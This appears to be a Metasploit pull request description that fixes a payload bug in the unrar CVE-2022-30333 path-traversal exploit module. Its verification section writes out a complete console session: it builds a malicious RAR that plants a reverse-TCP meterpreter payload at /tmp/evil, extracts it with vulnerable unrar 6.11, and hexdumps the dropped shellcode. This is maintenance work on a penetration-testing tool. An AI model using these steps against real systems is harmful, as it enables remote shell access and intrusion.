metasploit-framework
Fix a payload bug in unrar_cve_2022_30333
I'm not sure why, but setting Space messes things up. This fixes https://github.com/rapid7/metasploit-framework/issues/16924
Verification
Run the exploit:
msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../../../tmp/evil
TARGET_PATH => ../../../../../../../../tmp/evil
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit
[*] Target filename: ../../../../../../../../tmp/evil
[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
Unrar the payload.rar file with Unrar 6.11 or earlier:
ron@fedora ~/.msf4/local $ ~/tools/unrar/unrar x -o+ ./payload.rar
UNRAR 6.11 freeware Copyright (c) 1993-2022 Alexander Roshal
Extracting from ./payload.rar
Extracting ylhfjkhlfu OK
Extracting ylhfjkhlfu OK
All OK
The start of the file should be the payload (followed by random junk):
ron@fedora ~/.msf4/local $ hexdump -C /tmp/evil | head
00000000 48 31 ff 6a 09 58 99 b6 10 48 89 d6 4d 31 c9 6a |H1.j.X...H..M1.j|
00000010 22 41 5a b2 07 0f 05 48 85 c0 78 51 6a 0a 41 59 |"AZ....H..xQj.AY|
00000020 50 6a 29 58 99 6a 02 5f 6a 01 5e 0f 05 48 85 c0 |Pj)X.j._j.^..H..|
00000030 78 3b 48 97 48 b9 02 00 11 5c 0a 00 00 92 51 48 |x;H.H....\....QH|
00000040 89 e6 6a 10 5a 6a 2a 58 0f 05 59 48 85 c0 79 25 |..j.Zj*X..YH..y%|
00000050 49 ff c9 74 18 57 6a 23 58 6a 00 6a 05 48 89 e7 |I..t.Wj#Xj.j.H..|
00000060 48 31 f6 0f 05 59 59 5f 48 85 c0 79 c7 6a 3c 58 |H1...YY_H..y.j<X|
00000070 6a 01 5f 0f 05 5e 6a 7e 5a 0f 05 48 85 c0 78 ed |j._..^j~Z..H..x.|
00000080 ff e6 6c d3 58 9b a5 5c 96 55 58 92 b9 d1 d8 f7 |..l.X..\.UX.....|